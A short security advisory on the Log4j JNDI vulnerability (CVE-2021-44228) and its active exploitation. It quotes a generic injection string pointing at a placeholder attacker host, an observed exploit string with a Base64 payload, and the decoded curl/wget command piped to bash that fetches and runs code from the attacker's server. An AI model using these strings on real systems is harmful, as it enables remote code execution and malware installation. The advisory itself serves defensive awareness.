Critical Apache Log4j vulnerability being exploited in the wild

his vulnerability exists in the JNDI component of the LDAP connector, which allows an attacker to retrieve a payload from a remote server and execute it locally. Several proofs-of-concept and vulnerability walkthroughs have already been published. This vulnerability can be triggered to retrieve and execute a malicious class file. The vulnerability resides in the Java Naming and Directory Interface (JNDI) implementation and can be triggered using an LDAP request like the example below. ${jndi:ldap://attacker_controled_website/payload_to_be_executed} The Kenna Risk Score for CVE-2021-44228 is 93 out of 100, an exceptionally rare score reflecting the severity and potential impact of this vulnerability. Analysts are currently observing widespread active exploitation across telemetry. Below is an example of one of the exploitation attempts analysts have observed in the wild. ${jndi:ldap://45.155.205[.]233[:]12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC9bdmljdGltIElQXTpbdmljdGltIHBvcnRdfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0L1t2aWN0aW0gSVBdOlt2aWN0aW0gcG9ydF0pfGJhc2gK} The Base64-encoded data in the previous example is responsible for the delivery and execution of additional malicious payloads, an example of which is shown below. (curl -s 45.155.205[.]233[:]5874/[victim IP]:[victim port]||wget -q -O- 45.155.205[.]233[:]5874/[victim IP]:[victim port])|bash In many cases, following successful exploitation, victims are being infected with cryptocurrency mining malware.